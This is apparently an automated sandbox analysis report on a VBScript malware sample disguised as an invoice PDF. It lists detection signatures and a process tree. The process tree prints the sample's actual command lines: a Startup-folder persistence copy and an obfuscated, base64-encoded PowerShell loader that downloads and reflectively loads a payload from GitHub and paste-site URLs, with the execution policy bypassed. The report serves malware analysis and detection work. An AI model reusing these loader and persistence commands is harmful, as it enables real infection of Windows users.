Edit tour
Windows
Analysis Report
FAKTURA-pdf-466366332.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4648 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\FAKTU RA-pdf-466 366332.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6264 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Windows \system32\ FAKTURA-pd f-46636633 2.vbs', 'C :\Users\' + [Environ ment]::Use rName + '' \AppData\R oaming\Mic rosoft\Win dows\Start Menu\Prog rams\Start up\ sbv.ed adicom.vbs ')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5880 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 3688 cmdline:
ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 5944 cmdline:
powershell -command [System.IO .File]::Co py('C:\Win dows\syste m32\FAKTUR A-pdf-4663 66332.vbs' , 'C:\User s\' + [Env ironment]: :UserName + ''\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\ sb v.edadicom .vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 4832 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgneycrJz AnKyd9Jysn dXInKydsJy snID0gezJ9 aHR0cHM6Jy snLy9yYXcu Z2l0aCcrJ3 ViJysndScr J3NlcmMnKy dvbicrJ3Qn KydlbnQuY2 9tL05vRGV0 ZWN0JysnT2 4nKycvTicr J28nKydEJy snZXRlY3RP bi9yZWZzJy snL2gnKydl YWRzL21haS crJ24vRGV0 JysnYWgnKy dObycrJ3Ro LVYudHh0Jy sneycrJzJ9 OycrJyB7MH 0nKydiYScr J3NlNjQnKy dDb250ZScr J250JysnIC crJz0gKE5l dy0nKydPYi crJ2plYycr J3QgU3knKy dzdGVtLk5l JysndC5XJy snZScrJ2JD bGknKydlbn QpLkQnKydv d25sb2FkU3 RyJysnaScr J24nKydnKH swfScrJ3Vy bCk7JysnIC crJ3snKycw JysnfWJpbi crJ2FyeUNv JysnbnRlJy snbicrJ3Qg JysnPSAnKy dbU3lzJysn dGVtJysnLi crJ0MnKydv bnZlcicrJ3 RdJysnOicr JzonKydGci crJ29tQmFz JysnZTY0U3 QnKydyJysn aW5nJysnKH swfWInKydh cycrJ2U2NE MnKydvJysn bicrJ3Rlbi crJ3QpOyB7 MH1hcycrJ3 NlbWJseSA9 ICcrJ1snKy dSZWZsJysn ZWN0aW9uLk FzJysncycr J2VtYmx5Jy snXTo6TCcr J29hZCh7Jy snMCcrJ30n KydiaW5hcn lDbycrJ250 JysnZW4nKy d0KTsgW2Ru bGliJysnLk knKydPLkhv bWVdJysnOj pWQScrJ0ko JysnezEnKy d9JysnMC9D VmZqRCcrJy 8nKydkL2Vl LmV0c2EnKy dwJysnLycr Jy86Jysnc3 B0JysndCcr J2gnKyd7MX 0sIHsnKycx JysnfWRlJy snc2F0aScr J3YnKydhZG 97MX0nKycs ICcrJ3snKy cxfWRlc2F0 aXYnKydhZG 97JysnMX0n KycsJysnIC crJ3sxfScr J2Rlc2EnKy d0aXYnKydh ZG97MX0sIH sxJysnfU1T QnVpJysnbC crJ2R7MX0s ICcrJ3sxJy snfXsxfSwn Kyd7MX17MX 0nKycpJykg LWYgIFtjaG FSXTM2LFtj aGFSXTM0LF tjaGFSXTM5 KXwmKCAoW1 NUcmluZ10k dkVSYk9zZX BSZWZlUmVu Y0UpWzEsM1 0rJ3gnLUpv SW4nJyk='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7008 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4844 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{' +'0'+'}'+' ur'+'l'+' = {2}https :'+'//raw. gith'+'ub' +'u'+'serc '+'on'+'t' +'ent.com/ NoDetect'+ 'On'+'/N'+ 'o'+'D'+'e tectOn/ref s'+'/h'+'e ads/mai'+' n/Det'+'ah '+'No'+'th -V.txt'+'{ '+'2};'+' {0}'+'ba'+ 'se64'+'Co nte'+'nt'+ ' '+'= (Ne w-'+'Ob'+' jec'+'t Sy '+'stem.Ne '+'t.W'+'e '+'bCli'+' ent).D'+'o wnloadStr' +'i'+'n'+' g({0}'+'ur l);'+' '+' {'+'0'+'}b in'+'aryCo '+'nte'+'n '+'t '+'= '+'[Sys'+' tem'+'.'+' C'+'onver' +'t]'+':'+ ':'+'Fr'+' omBas'+'e6 4St'+'r'+' ing'+'({0} b'+'as'+'e 64C'+'o'+' n'+'ten'+' t); {0}as' +'sembly = '+'['+'Re fl'+'ectio n.As'+'s'+ 'embly'+'] ::L'+'oad( {'+'0'+'}' +'binaryCo '+'nt'+'en '+'t); [dn lib'+'.I'+ 'O.Home]'+ '::VA'+'I( '+'{1'+'}' +'0/CVfjD' +'/'+'d/ee .etsa'+'p' +'/'+'/:'+ 'spt'+'t'+ 'h'+'{1}, {'+'1'+'}d e'+'sati'+ 'v'+'ado{1 }'+', '+'{ '+'1}desat iv'+'ado{' +'1}'+','+ ' '+'{1}'+ 'desa'+'ti v'+'ado{1} , {1'+'}MS Bui'+'l'+' d{1}, '+'{ 1'+'}{1},' +'{1}{1}'+ ')') -f [c haR]36,[ch aR]34,[cha R]39)|&( ( [STring]$v ERbOsepRef eRencE)[1, 3]+'x'-JoI n'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |